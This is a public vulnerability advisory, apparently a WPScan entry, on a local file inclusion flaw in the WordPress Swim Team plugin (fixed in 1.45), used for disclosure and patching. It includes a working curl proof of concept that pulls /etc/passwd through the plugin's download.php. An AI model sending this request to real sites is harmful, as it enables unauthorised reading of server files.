Swim Team <= v1.44.10777 - Local File InclusionSign up to our free email alerts service for instant vulnerability notifications!
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files.
|Proof of Concept||
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
fixed in version 1.45
|OWASP Top 10||A1: Injection|
|Submitter||Larry W. Cashdollar|
|Publicly Published||2015-07-03 (almost 2 years ago)|
|Added||2015-07-03 (almost 2 years ago)|
|Last Updated||2015-07-13 (almost 2 years ago)|
Copyright & License
|Copyright||All data and resources contained within this page and this web site is Copyright © The WPScan Team.|
|License||Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.|